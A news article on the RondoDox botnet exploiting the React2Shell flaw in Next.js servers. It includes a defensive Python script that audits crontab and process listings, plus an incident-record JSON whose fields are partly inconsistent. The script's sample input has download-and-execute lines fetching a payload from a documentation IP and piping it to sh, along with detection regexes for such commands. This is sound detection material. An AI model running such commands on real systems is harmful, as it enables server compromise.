**RondoDox Botnet Exploits React2Shell Flaw to Infect Next.js Servers with Malware**
The RondoDox botnet, first documented by Fortinet in July 2025, has been actively exploiting the React2Shell vulnerability (CVE-2025-55182) to compromise Next.js servers with malware and cryptominers. React2Shell is an unauthenticated remote code execution (RCE) flaw in the React Server Components (RSC) 'Flight' protocol, so it affects frameworks built on RSC such as Next.js; a single crafted HTTP request is enough to execute code on the server.
In December 2025, cybersecurity firm CloudSEK observed RondoDox scanning for vulnerable Next.js servers from December 8, with active exploitation beginning three days later. The botnet has since launched more than 40 exploit attempts in six days against exposed instances; the Shadowserver Foundation counted over 94,000 exposed instances as of December 30.
RondoDox has evolved through three operational phases in 2025:
- March–April: Reconnaissance and vulnerability testing
- April–June: Automated web application exploitation
- July–Present: Large-scale IoT botnet deployment, targeting Linksys, Wavlink, and other routers in hourly waves.
Once a server is compromised, RondoDox deploys multiple payloads, including:
- A cryptominer (/nuts/poop)
- A botnet loader and health checker (/nuts/bolts), which removes competing malware, enforces persistence via /etc/crontab, and terminates non-whitelisted processes every 45 seconds
- A Mirai variant (/nuts/x86)
The React2Shell flaw has also been exploited by North Korean hackers, who used it to deploy EtherRAT, a new malware family. The widespread targeting underscores the vulnerability’s severity in both enterprise and consumer environments.
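Host-side triage for the post-compromise behaviour described above, as an added example (not CloudSEK's, Fortinet's, or the botnet operators' code). It takes the payload names (/nuts/poop, /nuts/bolts, /nuts/x86) and the /etc/crontab persistence from the article; the remaining checks (download-and-execute cron one-liners, binaries executing from world-writable directories, a shell or downloader spawned directly by the Node.js server process) are generic post-exploitation heuristics assumed here, not indicators the article lists. The crontab and process listing are constructed sample input, and 203.0.113.10 is a documentation address. The same script covers the "monitor for suspicious processes" recommendation in the incident record.

```python
"""Triage /etc/crontab and a process listing for RondoDox-style persistence.

Added example. Payload names come from the article; the generic heuristics
(cron download-and-execute, world-writable dirs, shell under the Node server)
are assumptions about typical loader tradecraft. Sample input is constructed.
"""
import re
from dataclasses import dataclass

RONDODOX_PAYLOADS = ("/nuts/poop", "/nuts/bolts", "/nuts/x86")

# Generic red flags (assumptions, not article indicators), checked in order.
SUSPICIOUS_CRON_PATTERNS = (
    ("download-and-execute one-liner", re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")),
    ("runs from a world-writable directory", re.compile(r"(^|\s)/(tmp|dev/shm|var/tmp)/")),
    ("reboot persistence", re.compile(r"^@reboot\b")),
)
WORLD_WRITABLE = re.compile(r"^/(tmp|dev/shm|var/tmp)/")
SHELLS_AND_DOWNLOADERS = {"sh", "bash", "dash", "curl", "wget"}
WEB_SERVER_BINARIES = {"node", "next"}   # assumption: how the Next.js server shows up in ps


@dataclass
class Finding:
    source: str   # "crontab" or "process"
    line: str     # the offending entry, verbatim
    reason: str


def parse_crontab(text):
    """Return (schedule, user, command) tuples from /etc/crontab-format text.
    The system crontab has a user field before the command; '@reboot'-style
    lines carry a single schedule token instead of five."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split(None, 1)[0]:
            continue                      # comment or environment assignment
        fields, n = (line.split(None, 2), 3) if line.startswith("@") else (line.split(None, 6), 7)
        if len(fields) < n:
            continue                      # malformed; cron would reject it too
        entries.append((" ".join(fields[: n - 2]), fields[n - 2], fields[n - 1]))
    return entries


def audit_crontab(text):
    findings = []
    for schedule, user, command in parse_crontab(text):
        entry = f"{schedule} {user} {command}"
        if any(name in command for name in RONDODOX_PAYLOADS):
            findings.append(Finding("crontab", entry, "references a RondoDox payload name"))
        for reason, pattern in SUSPICIOUS_CRON_PATTERNS:
            if pattern.search(entry):
                findings.append(Finding("crontab", entry, reason))
                break                     # one generic reason per entry is enough
    return findings


def audit_processes(ps_text):
    """ps_text: output of `ps -eo pid,ppid,user,args --no-headers`."""
    procs = {}
    for raw in ps_text.splitlines():
        parts = raw.split(None, 3)
        if len(parts) == 4 and parts[0].isdigit():
            procs[int(parts[0])] = (int(parts[1]), parts[2], parts[3])
    findings = []
    for pid, (ppid, user, args) in procs.items():
        entry = f"{pid} {ppid} {user} {args}"
        exe = args.split()[0]
        if any(name in args for name in RONDODOX_PAYLOADS):
            findings.append(Finding("process", entry, "command line references a RondoDox payload name"))
        elif WORLD_WRITABLE.match(exe):
            findings.append(Finding("process", entry, "executable runs from a world-writable directory"))
        parent = procs.get(ppid)   # a shell/downloader whose parent is the web server is a strong RCE signal
        if parent and exe.rsplit("/", 1)[-1] in SHELLS_AND_DOWNLOADERS:
            if parent[2].split()[0].rsplit("/", 1)[-1] in WEB_SERVER_BINARIES:
                findings.append(Finding("process", entry, f"shell/downloader spawned by web server process {ppid}"))
    return findings


def triage(crontab_text, ps_text):
    return audit_crontab(crontab_text) + audit_processes(ps_text)


# Constructed sample input: two stock Debian cron lines plus two planted ones.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
* * * * *       root    /tmp/.x/bolts >/dev/null 2>&1
@reboot         root    wget -q -O- http://203.0.113.10/nuts/bolts | sh
"""
SAMPLE_PS = """\
    1     0 root /sbin/init
  812     1 app  node /srv/app/node_modules/.bin/next start
  813   812 app  sh -c id
 4410   812 app  sh -c wget -q http://203.0.113.10/nuts/bolts -O /tmp/.x/bolts; chmod +x /tmp/.x/bolts; /tmp/.x/bolts
 4411  4410 app  /tmp/.x/bolts
 4412  4411 app  /tmp/.x/poop
 4500     1 root /usr/sbin/cron -f
"""

if __name__ == "__main__":
    for f in triage(SAMPLE_CRONTAB, SAMPLE_PS):
        print(f"[{f.source}] {f.reason}: {f.line}")
```

Run it on a real host by feeding the contents of /etc/crontab and the output of `ps -eo pid,ppid,user,args --no-headers`; the parent-process check is the one worth keeping even after the payload names rotate, because a Next.js server has no business spawning `sh` or `wget` in normal operation.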
Fortinet cybersecurity rating report: https://www.rankiteo.com/company/fortinet
CloudSEK cybersecurity rating report: https://www.rankiteo.com/company/cloudsek
{"id": "FORCLO1767196505",
 "linkid": "fortinet, cloudsek",
 "type": "Vulnerability",
 "date": "12/2025",
 "severity": "25",
 "impact": "1",
 "explanation": "Attack without any consequences"}
{'affected_entities': [{'industry': 'Technology, Enterprise, Consumer Electronics',
                        'location': 'Global',
                        'type': 'Web Application Servers, IoT Devices'}],
 'attack_vector': 'Exploitation of React2Shell (CVE-2025-55182) via HTTP request',
 'data_breach': {'data_encryption': 'None reported'},
 'date_detected': '2025-12-08',
 'date_publicly_disclosed': '2025-07',
 'description': 'The RondoDox botnet has been observed exploiting the critical React2Shell flaw (CVE-2025-55182) to infect vulnerable Next.js servers with malware and cryptominers. The botnet conducts large-scale IoT exploitation and deploys payloads including coinminers, botnet loaders, and Mirai variants.',
 'impact': {'operational_impact': 'Process termination, persistence enforcement, removal of competing malware',
            'systems_affected': 'Next.js servers, IoT devices (Linksys, Wavlink routers), enterprise routers'},
 'initial_access_broker': {'entry_point': 'React2Shell (CVE-2025-55182), IoT devices (Linksys, Wavlink routers)',
                           'reconnaissance_period': 'March to April 2025'},
 'investigation_status': 'Ongoing',
 'motivation': 'Financial gain (cryptomining), botnet expansion',
 'post_incident_analysis': {'corrective_actions': 'Patching vulnerable systems, network segmentation, enhanced monitoring',
                            'root_causes': 'Exploitation of unpatched React2Shell vulnerability, lack of IoT device segmentation'},
 'ransomware': {'data_encryption': 'None reported (the Mirai variant is a DDoS bot, not ransomware)'},
 'recommendations': ['Audit and patch Next.js Server Actions',
                     'Isolate IoT devices into dedicated virtual LANs',
                     'Monitor for suspicious processes being executed'],
 'references': [{'date_accessed': '2025-12-30', 'source': 'CloudSEK'},
                {'date_accessed': '2025-07', 'source': 'Fortinet'},
                {'date_accessed': '2025-11', 'source': 'VulnCheck'},
                {'date_accessed': '2025-12-30', 'source': 'Shadowserver Foundation'}],
 'response': {'enhanced_monitoring': 'Monitoring for suspicious processes',
              'network_segmentation': 'Isolating IoT devices into dedicated VLANs',
              'remediation_measures': 'Auditing and patching Next.js Server Actions, isolating IoT devices into dedicated VLANs, monitoring for suspicious processes',
              'third_party_assistance': 'CloudSEK, Fortinet, VulnCheck, Shadowserver Foundation'},
 'threat_actor': 'RondoDox Botnet',
 'title': 'RondoDox Botnet Exploits React2Shell (CVE-2025-55182) to Infect Next.js Servers',
 'type': 'Botnet Infection, Cryptojacking, Remote Code Execution (RCE)',
 'vulnerability_exploited': 'React2Shell (CVE-2025-55182), CVE-2025-24893'}